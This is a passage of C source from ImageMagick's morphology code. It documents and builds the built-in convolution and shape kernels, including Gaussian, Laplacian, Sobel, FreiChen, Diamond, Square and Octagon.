% 45 degrees to generate the 8 angled varients of each of the kernels.
%
% Laplacian:{type}
% Discrete Lapacian Kernels, (without normalization)
% Type 0 : 3x3 with center:8 surounded by -1 (8 neighbourhood)
% Type 1 : 3x3 with center:4 edge:-1 corner:0 (4 neighbourhood)
% Type 2 : 3x3 with center:4 edge:1 corner:-2
% Type 3 : 3x3 with center:4 edge:-2 corner:1
% Type 5 : 5x5 laplacian
% Type 7 : 7x7 laplacian
% Type 15 : 5x5 LoG (sigma approx 1.4)
% Type 19 : 9x9 LoG (sigma approx 1.4)
%
% Sobel:{angle}
% Sobel 'Edge' convolution kernel (3x3)
% | -1, 0, 1 |
% | -2, 0,-2 |
% | -1, 0, 1 |
%
% Roberts:{angle}
% Roberts convolution kernel (3x3)
% | 0, 0, 0 |
% | -1, 1, 0 |
% | 0, 0, 0 |
%
% Prewitt:{angle}
% Prewitt Edge convolution kernel (3x3)
% | -1, 0, 1 |
% | -1, 0, 1 |
% | -1, 0, 1 |
%
% Compass:{angle}
% Prewitt's "Compass" convolution kernel (3x3)
% | -1, 1, 1 |
% | -1,-2, 1 |
% | -1, 1, 1 |
%
% Kirsch:{angle}
% Kirsch's "Compass" convolution kernel (3x3)
% | -3,-3, 5 |
% | -3, 0, 5 |
% | -3,-3, 5 |
%
% FreiChen:{angle}
% Frei-Chen Edge Detector is based on a kernel that is similar to
% the Sobel Kernel, but is designed to be isotropic. That is it takes
% into account the distance of the diagonal in the kernel.
%
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) |
% | 1, 0, -1 |
%
% FreiChen:{type},{angle}
%
% Frei-Chen Pre-weighted kernels...
%
% Type 0: default un-nomalized version shown above.
%
% Type 1: Orthogonal Kernel (same as type 11 below)
% | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 2: Diagonal form of Kernel...
% | 1, sqrt(2), 0 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 0, -sqrt(2) -1 |
%
% However this kernel is als at the heart of the FreiChen Edge Detection
% Process which uses a set of 9 specially weighted kernel. These 9
% kernels not be normalized, but directly applied to the image. The
% results is then added together, to produce the intensity of an edge in
% a specific direction. The square root of the pixel value can then be
% taken as the cosine of the edge, and at least 2 such runs at 90 degrees
% from each other, both the direction and the strength of the edge can be
% determined.
%
% Type 10: All 9 of the following pre-weighted kernels...
%
% Type 11: | 1, 0, -1 |
% | sqrt(2), 0, -sqrt(2) | / 2*sqrt(2)
% | 1, 0, -1 |
%
% Type 12: | 1, sqrt(2), 1 |
% | 0, 0, 0 | / 2*sqrt(2)
% | 1, sqrt(2), 1 |
%
% Type 13: | sqrt(2), -1, 0 |
% | -1, 0, 1 | / 2*sqrt(2)
% | 0, 1, -sqrt(2) |
%
% Type 14: | 0, 1, -sqrt(2) |
% | -1, 0, 1 | / 2*sqrt(2)
% | sqrt(2), -1, 0 |
%
% Type 15: | 0, -1, 0 |
% | 1, 0, 1 | / 2
% | 0, -1, 0 |
%
% Type 16: | 1, 0, -1 |
% | 0, 0, 0 | / 2
% | -1, 0, 1 |
%
% Type 17: | 1, -2, 1 |
% | -2, 4, -2 | / 6
% | -1, -2, 1 |
%
% Type 18: | -2, 1, -2 |
% | 1, 4, 1 | / 6
% | -2, 1, -2 |
%
% Type 19: | 1, 1, 1 |
% | 1, 1, 1 | / 3
% | 1, 1, 1 |
%
% The first 4 are for edge detection, the next 4 are for line detection
% and the last is to add a average component to the results.
%
% Using a special type of '-1' will return all 9 pre-weighted kernels
% as a multi-kernel list, so that you can use them directly (without
% normalization) with the special "-set option:morphology:compose Plus"
% setting to apply the full FreiChen Edge Detection Technique.
%
% If 'type' is large it will be taken to be an actual rotation angle for
% the default FreiChen (type 0) kernel. As such FreiChen:45 will look
% like a Sobel:45 but with 'sqrt(2)' instead of '2' values.
%
% WARNING: The above was layed out as per
% http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf
% But rotated 90 degrees so direction is from left rather than the top.
% I have yet to find any secondary confirmation of the above. The only
% other source found was actual source code at
% http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf
% Neigher paper defineds the kernels in a way that looks locical or
% correct when taken as a whole.
%
% Boolean Kernels
%
% Diamond:[{radius}[,{scale}]]
% Generate a diamond shaped kernel with given radius to the points.
% Kernel size will again be radius*2+1 square and defaults to radius 1,
% generating a 3x3 kernel that is slightly larger than a square.
%
% Square:[{radius}[,{scale}]]
% Generate a square shaped kernel of size radius*2+1, and defaulting
% to a 3x3 (radius 1).
%
% Octagon:[{radius}[,{scale}]]
% Generate octagonal shaped kernel of given radius and constant scale.
% Default radius is 3 producing a 7x7 kernel. A radius of 1 will result
% in "Diamond" kernel.
%
% Disk:[{radius}[,{scale}]]
% Generate a binary disk, thresholded at the radius given, the radius
% may be a float-point value. Final Kernel size is floor(radius)*2+1
% square. A radius of 5.3 is the default.
%
% NOTE: That a low radii Disk kernels produce the same results as
% many of the previously defined kernels, but differ greatly at larger
% radii. Here is a table of equivalences...
% "Disk:1" => "Diamond", "Octagon:1", or "Cross:1"
% "Disk:1.5" => "Square"
% "Disk:2" => "Diamond:2"
% "Disk:2.5" => "Octagon"
% "Disk:2.9" => "Square:2"
% "Disk:3.5" => "Octagon:3"
% "Disk:4.5" => "Octagon:4"
% "Disk:5.4" => "Octagon:5"
% "Disk:6.4" => "Octagon:6"
% All other Disk shapes are unique to this kernel, but because a "Disk"
% is more circular when using a larger radius, using a larger radius is
% preferred over iterating the morphological operation.
%
% Rectangle:{geometry}
% Simply generate a rectangle of 1's with the size given. You can also
% specify the location of the 'control point', otherwise the closest
% pixel to the center of the rectangle is selected.
%
% Properly centered and odd sized rectangles work the best.
%
% Symbol Dilation Kernels
%
% These kernel is not a good general morphological kernel, but is used
% more for highlighting and marking any single pixels in an image using,
% a "Dilate" method as appropriate.
%
% For the same reasons iterating these kernels does not produce the
% same result as using a larger radius for the symbol.
%
% Plus:[{radius}[,{scale}]]
% Cross:[{radius}[,{scale}]]
% Generate a kernel in the shape of a 'plus' or a 'cross' with
% a each arm the length of the given radius (default 2).
%
% NOTE: "plus:1" is equivelent to a "Diamond" kernel.
%
% Ring:{radius1},{radius2}[,{scale}]
% A ring of the values given that falls between the two radii.
% Defaults to a ring of approximataly 3 radius in a 7x7 kernel.
% This is the 'edge' pixels of the default "Disk" kernel,
% More specifically, "Ring" -> "Ring:2.5,3.5,1.0"
%
% Hit and Miss Kernels
%
% Peak:radius1,radius2
% Find any peak larger than the pixels the fall between the two radii.
% The default ring of pixels is as per "Ring".
% Edges
% Find flat orthogonal edges of a binary shape
% Corners
% Find 90 degree corners of a binary shape
% Diagonals:type
% A special kernel to thin the 'outside' of diagonals
% LineEnds:type
% Find end points of lines (for pruning a skeletion)
% Two types of lines ends (default to both) can be searched for
% Type 0: All line ends
% Type 1: single kernel for 4-conneected line ends
% Type 2: single kernel for simple line ends
% LineJunctions
% Find three line junctions (within a skeletion)
% Type 0: all line junctions
% Type 1: Y Junction kernel
% Type 2: Diagonal T Junction kernel
% Type 3: Orthogonal T Junction kernel
% Type 4: Diagonal X Junction kernel
% Type 5: Orthogonal + Junction kernel
% Ridges:type
% Find single pixel ridges or thin lines
% Type 1: Fine single pixel thick lines and ridges
% Type 2: Find two pixel thick lines and ridges
% ConvexHull
% Octagonal Thickening Kernel, to generate convex hulls of 45 degrees
% Skeleton:type
% Traditional skeleton generating kernels.
% Type 1: Tradional Skeleton kernel (4 connected skeleton)
% Type 2: HIPR2 Skeleton kernel (8 connected skeleton)
% Type 3: Thinning skeleton based on a ressearch paper by
% Dan S. Bloomberg (Default Type)
% ThinSE:type
% A huge variety of Thinning Kernels designed to preserve conectivity.
% many other kernel sets use these kernels as source definitions.
% Type numbers are 41-49, 81-89, 481, and 482 which are based on
% the super and sub notations used in the source research paper.
%
% Distance Measuring Kernels
%
% Different types of distance measuring methods, which are used with the
% a 'Distance' morphology method for generating a gradient based on
% distance from an edge of a binary shape, though there is a technique
% for handling a anti-aliased shape.
%
% See the 'Distance' Morphological Method, for information of how it is
% applied.
%
% Chebyshev:[{radius}][x{scale}[%!]]
% Chebyshev Distance (also known as Tchebychev or Chessboard distance)
% is a value of one to any neighbour, orthogonal or diagonal. One why
% of thinking of it is the number of squares a 'King' or 'Queen' in
% chess needs to traverse reach any other position on a chess board.
% It results in a 'square' like distance function, but one where
% diagonals are given a value that is closer than expected.
%
% Manhattan:[{radius}][x{scale}[%!]]
% Manhattan Distance (also known as Rectilinear, City Block, or the Taxi
% Cab distance metric), it is the distance needed when you can only
% travel in horizontal or vertical directions only. It is the
% distance a 'Rook' in chess would have to travel, and results in a
% diamond like distances, where diagonals are further than expected.
%
% Octagonal:[{radius}][x{scale}[%!]]
% An interleving of Manhatten and Chebyshev metrics producing an
% increasing octagonally shaped distance. Distances matches those of
% the "Octagon" shaped kernel of the same radius. The minimum radius
% and default is 2, producing a 5x5 kernel.
%
% Euclidean:[{radius}][x{scale}[%!]]
% Euclidean distance is the 'direct' or 'as the crow flys' distance.
% However by default the kernel size only has a radius of 1, which
% limits the distance to 'Knight' like moves, with only orthogonal and
% diagonal measurements being correct. As such for the default kernel
% you will get octagonal like distance function.
%
% However using a larger radius such as "Euclidean:4" you will get a
% much smoother distance gradient from the edge of the shape. Especially
% if the image is pre-processed to include any anti-aliasing pixels.
% Of course a larger kernel is slower to use, and not always needed.
%
% The first three Distance Measuring Kernels will only generate distances
% of exact multiples of {scale} in binary images. As such you can use a
% scale of 1 without loosing any information. However you also need some
% scaling when handling non-binary anti-aliased shapes.
%
% The "Euclidean" Distance Kernel however does generate a non-integer
% fractional results, and as such scaling is vital even for binary shapes.
%
*/
MagickExport KernelInfo *AcquireKernelBuiltIn(const KernelInfoType type,
const GeometryInfo *args)
{
KernelInfo
*kernel;
register ssize_t
i;
register ssize_t
u,
v;
double
nan = sqrt((double)-1.0); /* Special Value : Not A Number */
/* Generate a new empty kernel if needed */
kernel=(KernelInfo *) NULL;
switch(type) {
case UndefinedKernel: /* These should not call this function */
case UserDefinedKernel:
assert("Should not call this function" != (char *)NULL);
break;
case LaplacianKernel: /* Named Descrete Convolution Kernels */
case SobelKernel: /* these are defined using other kernels */
case RobertsKernel:
case PrewittKernel:
case CompassKernel:
case KirschKernel:
case FreiChenKernel:
case EdgesKernel: /* Hit and Miss kernels */
case CornersKernel:
case DiagonalsKernel:
case LineEndsKernel:
case LineJunctionsKernel:
case RidgesKernel:
case ConvexHullKernel:
case SkeletonKernel:
case ThinSEKernel:
break; /* A pre-generated kernel is not needed */
#if 0
/* set to 1 to do a compile-time check that we haven't missed anything */
case UnityKernel:
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case BlurKernel:
case CometKernel:
case DiamondKernel:
case SquareKernel:
case RectangleKernel:
case OctagonKernel:
case DiskKernel:
case PlusKernel:
case CrossKernel:
case RingKernel:
case PeaksKernel:
case ChebyshevKernel:
case ManhattanKernel:
case OctangonalKernel:
case EuclideanKernel:
#else
default:
#endif
/* Generate the base Kernel Structure */
kernel=(KernelInfo *) AcquireMagickMemory(sizeof(*kernel));
if (kernel == (KernelInfo *) NULL)
return(kernel);
(void) ResetMagickMemory(kernel,0,sizeof(*kernel));
kernel->minimum = kernel->maximum = kernel->angle = 0.0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->type = type;
kernel->next = (KernelInfo *) NULL;
kernel->signature = MagickSignature;
break;
}
switch(type) {
/*
Convolution Kernels
*/
case UnityKernel:
{
kernel->height = kernel->width = (size_t) 1;
kernel->x = kernel->y = (ssize_t) 0;
kernel->values=(double *) AcquireQuantumMemory(1,sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
kernel->maximum = kernel->values[0] = args->rho;
break;
}
break;
case GaussianKernel:
case DoGKernel:
case LoGKernel:
{ double
sigma = fabs(args->sigma),
sigma2 = fabs(args->xi),
A, B, R;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else if ( (type != DoGKernel) || (sigma >= sigma2) )
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma);
else
kernel->width = GetOptimalKernelWidth2D(args->rho,sigma2);
kernel->height = kernel->width;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* WARNING: The following generates a 'sampled gaussian' kernel.
* What we really want is a 'discrete gaussian' kernel.
*
* How to do this is I don't know, but appears to be basied on the
* Error Function 'erf()' (intergral of a gaussian)
*/
if ( type == GaussianKernel || type == DoGKernel )
{ /* Calculate a Gaussian, OR positive half of a DoG */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
if ( type == DoGKernel )
{ /* Subtract a Negative Gaussian for "Difference of Gaussian" */
if ( sigma2 > MagickEpsilon )
{ sigma = sigma2; /* simplify loop expressions */
A = 1.0/(2.0*sigma*sigma);
B = (double) (1.0/(Magick2PI*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] -= exp(-((double)(u*u+v*v))*A)*B;
}
else /* limiting case - a unity (normalized Dirac) kernel */
kernel->values[kernel->x+kernel->y*kernel->width] -= 1.0;
}
if ( type == LoGKernel )
{ /* Calculate a Laplacian of a Gaussian - Or Mexician Hat */
if ( sigma > MagickEpsilon )
{ A = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
B = (double) (1.0/(MagickPI*sigma*sigma*sigma*sigma));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
{ R = ((double)(u*u+v*v))*A;
kernel->values[i] = (1-R)*exp(-R)*B;
}
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
}
/* Note the above kernels may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigma's (> 0.1) the central value becomes larger than one, and thus
** producing a very bright kernel.
**
** Normalization will still be needed.
*/
/* Normalize the 2D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
break;
}
case BlurKernel:
{ double
sigma = fabs(args->sigma),
alpha, beta;
if ( args->rho >= 1.0 )
kernel->width = (size_t)args->rho*2+1;
else
kernel->width = GetOptimalKernelWidth1D(args->rho,sigma);
kernel->height = 1;
kernel->x = (ssize_t) (kernel->width-1)/2;
kernel->y = 0;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
#if 1
#define KernelRank 3
/* Formula derived from GetBlurKernel() in "effect.c" (plus bug fix).
** It generates a gaussian 3 times the width, and compresses it into
** the expected range. This produces a closer normalization of the
** resulting kernel, especially for very low sigma values.
** As such while wierd it is prefered.
**
** I am told this method originally came from Photoshop.
**
** A properly normalized curve is generated (apart from edge clipping)
** even though we later normalize the result (for edge clipping)
** to allow the correct generation of a "Difference of Blurs".
*/
/* initialize */
v = (ssize_t) (kernel->width*KernelRank-1)/2; /* start/end points to fit range */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
/* Calculate a Positive 1D Gaussian */
if ( sigma > MagickEpsilon )
{ sigma *= KernelRank; /* simplify loop expressions */
alpha = 1.0/(2.0*sigma*sigma);
beta= (double) (1.0/(MagickSQ2PI*sigma ));
for ( u=-v; u <= v; u++) {
kernel->values[(u+v)/KernelRank] +=
exp(-((double)(u*u))*alpha)*beta;
}
}
else /* special case - generate a unity kernel */
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
#else
/* Direct calculation without curve averaging */
/* Calculate a Positive Gaussian */
if ( sigma > MagickEpsilon )
{ alpha = 1.0/(2.0*sigma*sigma); /* simplify loop expressions */
beta = 1.0/(MagickSQ2PI*sigma);
for ( i=0, u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
kernel->values[i] = exp(-((double)(u*u))*alpha)*beta;
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
}
#endif
/* Note the above kernel may have been 'clipped' by a user defined
** radius, producing a smaller (darker) kernel. Also for very small
** sigma's (> 0.1) the central value becomes larger than one, and thus
** producing a very bright kernel.
**
** Normalization will still be needed.
*/
/* Normalize the 1D Gaussian Kernel
**
** NB: a CorrelateNormalize performs a normal Normalize if
** there are no negative values.
*/
CalcKernelMetaData(kernel); /* the other kernel meta-data */
ScaleKernelInfo(kernel, 1.0, CorrelateNormalizeValue);
/* rotate the 1D kernel by given angle */
RotateKernelInfo(kernel, args->xi );
break;
}
case CometKernel:
{ double
sigma = fabs(args->sigma),
A;
if ( args->rho < 1.0 )
kernel->width = (GetOptimalKernelWidth1D(args->rho,sigma)-1)/2+1;
else
kernel->width = (size_t)args->rho;
kernel->x = kernel->y = 0;
kernel->height = 1;
kernel->negative_range = kernel->positive_range = 0.0;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* A comet blur is half a 1D gaussian curve, so that the object is
** blurred in one direction only. This may not be quite the right
** curve to use so may change in the future. The function must be
** normalised after generation, which also resolves any clipping.
**
** As we are normalizing and not subtracting gaussians,
** there is no need for a divisor in the gaussian formula
**
** It is less comples
*/
if ( sigma > MagickEpsilon )
{
#if 1
#define KernelRank 3
v = (ssize_t) kernel->width*KernelRank; /* start/end points */
(void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*sizeof(double));
sigma *= KernelRank; /* simplify the loop expression */
A = 1.0/(2.0*sigma*sigma);
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( u=0; u < v; u++) {
kernel->values[u/KernelRank] +=
exp(-((double)(u*u))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
}
for (i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range += kernel->values[i];
#else
A = 1.0/(2.0*sigma*sigma); /* simplify the loop expression */
/* B = 1.0/(MagickSQ2PI*sigma); */
for ( i=0; i < (ssize_t) kernel->width; i++)
kernel->positive_range +=
kernel->values[i] =
exp(-((double)(i*i))*A);
/* exp(-((double)(i*i))/2.0*sigma*sigma)/(MagickSQ2PI*sigma); */
#endif
}
else /* special case - generate a unity kernel */
{ (void) ResetMagickMemory(kernel->values,0, (size_t)
kernel->width*kernel->height*sizeof(double));
kernel->values[kernel->x+kernel->y*kernel->width] = 1.0;
kernel->positive_range = 1.0;
}
kernel->minimum = 0.0;
kernel->maximum = kernel->values[0];
kernel->negative_range = 0.0;
ScaleKernelInfo(kernel, 1.0, NormalizeValue); /* Normalize */
RotateKernelInfo(kernel, args->xi); /* Rotate by angle */
break;
}
/*
Convolution Kernels - Well Known Named Constant Kernels
*/
case LaplacianKernel:
{ switch ( (int) args->rho ) {
case 0:
default: /* laplacian square filter -- default */
kernel=ParseKernelArray("3: -1,-1,-1 -1,8,-1 -1,-1,-1");
break;
case 1: /* laplacian diamond filter */
kernel=ParseKernelArray("3: 0,-1,0 -1,4,-1 0,-1,0");
break;
case 2:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
break;
case 3:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 1,-2,1");
break;
case 5: /* a 5x5 laplacian */
kernel=ParseKernelArray(
"5: -4,-1,0,-1,-4 -1,2,3,2,-1 0,3,4,3,0 -1,2,3,2,-1 -4,-1,0,-1,-4");
break;
case 7: /* a 7x7 laplacian */
kernel=ParseKernelArray(
"7:-10,-5,-2,-1,-2,-5,-10 -5,0,3,4,3,0,-5 -2,3,6,7,6,3,-2 -1,4,7,8,7,4,-1 -2,3,6,7,6,3,-2 -5,0,3,4,3,0,-5 -10,-5,-2,-1,-2,-5,-10" );
break;
case 15: /* a 5x5 LoG (sigma approx 1.4) */
kernel=ParseKernelArray(
"5: 0,0,-1,0,0 0,-1,-2,-1,0 -1,-2,16,-2,-1 0,-1,-2,-1,0 0,0,-1,0,0");
break;
case 19: /* a 9x9 LoG (sigma approx 1.4) */
/* http://www.cscjournals.org/csc/manuscript/Journals/IJIP/volume3/Issue1/IJIP-15.pdf */
kernel=ParseKernelArray(
"9: 0,-1,-1,-2,-2,-2,-1,-1,0 -1,-2,-4,-5,-5,-5,-4,-2,-1 -1,-4,-5,-3,-0,-3,-5,-4,-1 -2,-5,-3,12,24,12,-3,-5,-2 -2,-5,-0,24,40,24,-0,-5,-2 -2,-5,-3,12,24,12,-3,-5,-2 -1,-4,-5,-3,-0,-3,-5,-4,-1 -1,-2,-4,-5,-5,-5,-4,-2,-1 0,-1,-1,-2,-2,-2,-1,-1,0");
break;
}
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
break;
}
case SobelKernel:
{ /* Simple Sobel Kernel */
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case RobertsKernel:
{
kernel=ParseKernelArray("3: 0,0,0 1,-1,0 0,0,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case PrewittKernel:
{
kernel=ParseKernelArray("3: 1,0,-1 1,0,-1 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case CompassKernel:
{
kernel=ParseKernelArray("3: 1,1,-1 1,-2,-1 1,1,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case KirschKernel:
{
kernel=ParseKernelArray("3: 5,-3,-3 5,0,-3 5,-3,-3");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
RotateKernelInfo(kernel, args->rho);
break;
}
case FreiChenKernel:
/* Direction is set to be left to right positive */
/* http://www.math.tau.ac.il/~turkel/notes/edge_detectors.pdf -- RIGHT? */
/* http://ltswww.epfl.ch/~courstiv/exos_labos/sol3.pdf -- WRONG? */
{ switch ( (int) args->rho ) {
default:
case 0:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +MagickSQ2;
kernel->values[5] = -MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
break;
case 2:
kernel=ParseKernelArray("3: 1,2,0 2,0,-2 0,-2,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = kernel->values[3] = +MagickSQ2;
kernel->values[5] = kernel->values[7] = -MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 10:
kernel=AcquireKernelInfo("FreiChen:11;FreiChen:12;FreiChen:13;FreiChen:14;FreiChen:15;FreiChen:16;FreiChen:17;FreiChen:18;FreiChen:19");
if (kernel == (KernelInfo *) NULL)
return(kernel);
break;
case 1:
case 11:
kernel=ParseKernelArray("3: 1,0,-1 2,0,-2 1,0,-1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[3] = +MagickSQ2;
kernel->values[5] = -MagickSQ2;
CalcKernelMetaData(kernel); /* recalculate meta-data */
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 12:
kernel=ParseKernelArray("3: 1,2,1 0,0,0 1,2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[1] = +MagickSQ2;
kernel->values[7] = +MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 13:
kernel=ParseKernelArray("3: 2,-1,0 -1,0,1 0,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[0] = +MagickSQ2;
kernel->values[8] = -MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 14:
kernel=ParseKernelArray("3: 0,1,-2 -1,0,1 2,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
kernel->values[2] = -MagickSQ2;
kernel->values[6] = +MagickSQ2;
CalcKernelMetaData(kernel);
ScaleKernelInfo(kernel, (double) (1.0/2.0*MagickSQ2), NoValue);
break;
case 15:
kernel=ParseKernelArray("3: 0,-1,0 1,0,1 0,-1,0");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 16:
kernel=ParseKernelArray("3: 1,0,-1 0,0,0 -1,0,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/2.0, NoValue);
break;
case 17:
kernel=ParseKernelArray("3: 1,-2,1 -2,4,-2 -1,-2,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 18:
kernel=ParseKernelArray("3: -2,1,-2 1,4,1 -2,1,-2");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/6.0, NoValue);
break;
case 19:
kernel=ParseKernelArray("3: 1,1,1 1,1,1 1,1,1");
if (kernel == (KernelInfo *) NULL)
return(kernel);
kernel->type = type;
ScaleKernelInfo(kernel, 1.0/3.0, NoValue);
break;
}
if ( fabs(args->sigma) > MagickEpsilon )
/* Rotate by correctly supplied 'angle' */
RotateKernelInfo(kernel, args->sigma);
else if ( args->rho > 30.0 || args->rho < -30.0 )
/* Rotate by out of bounds 'type' */
RotateKernelInfo(kernel, args->rho);
break;
}
/*
Boolean or Shaped Kernels
*/
case DiamondKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values within diamond area to scale given */
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <= (long) kernel->x)
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
kernel->minimum = kernel->maximum = args->sigma; /* a flat shape */
break;
}
case SquareKernel:
case RectangleKernel:
{ double
scale;
if ( type == SquareKernel )
{
if (args->rho < 1.0)
kernel->width = kernel->height = 3; /* default radius = 1 */
else
kernel->width = kernel->height = (size_t) (2*args->rho+1);
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
scale = args->sigma;
}
else {
/* NOTE: user defaults set in "AcquireKernelInfo()" */
if ( args->rho < 1.0 || args->sigma < 1.0 )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->width = (size_t)args->rho;
kernel->height = (size_t)args->sigma;
if ( args->xi < 0.0 || args->xi > (double)kernel->width ||
args->psi < 0.0 || args->psi > (double)kernel->height )
return(DestroyKernelInfo(kernel)); /* invalid args given */
kernel->x = (ssize_t) args->xi;
kernel->y = (ssize_t) args->psi;
scale = 1.0;
}
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
/* set all kernel values to scale given */
u=(ssize_t) (kernel->width*kernel->height);
for ( i=0; i < u; i++)
kernel->values[i] = scale;
kernel->minimum = kernel->maximum = scale; /* a flat shape */
kernel->positive_range = scale*u;
break;
}
case OctagonKernel:
{
if (args->rho < 1.0)
kernel->width = kernel->height = 5; /* default radius = 2 */
else
kernel->width = kernel->height = ((size_t)args->rho)*2+1;
kernel->x = kernel->y = (ssize_t) (kernel->width-1)/2;
kernel->values=(double *) AcquireQuantumMemory(kernel->width,
kernel->height*sizeof(double));
if (kernel->values == (double *) NULL)
return(DestroyKernelInfo(kernel));
for ( i=0, v=-kernel->y; v <= (ssize_t)kernel->y; v++)
for ( u=-kernel->x; u <= (ssize_t)kernel->x; u++, i++)
if ( (labs((long) u)+labs((long) v)) <=
((long)kernel->x + (long)(kernel->x/2)) )
kernel->positive_range += kernel->values[i] = args->sigma;
else
kernel->values[i] = nan;
